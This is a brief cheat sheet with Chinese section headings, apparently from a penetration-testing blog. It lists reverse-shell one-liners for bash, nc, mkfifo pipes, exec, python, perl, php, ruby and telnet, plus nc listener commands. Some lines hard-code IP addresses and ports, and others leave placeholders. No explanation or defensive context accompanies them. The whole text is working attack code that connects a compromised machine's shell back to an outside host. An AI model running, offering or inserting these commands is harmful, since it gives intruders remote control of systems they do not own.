开启监听

1
2
3
nc -lvvp 9999
# or 
nc -lvvnp 9999

bash

1
bash -i >& /dev/tcp/ip/port 0>&1

nc

1
nc -e /bin/sh ip port

如果 nc 没有 -e 选项的话

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.144 1234 >/tmp/f

exec

1
exec 5<>/dev/tcp/192.168.204.144/1234;cat <&5|while read line;do $line >&5 2>&1;done

python

1
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

perl

1
2
3
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

php

1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby

1
ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.204.137","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

telnet

1
telnet 192.168.204.144 4444 | /bin/bash | telnet 192.168.204.144 5555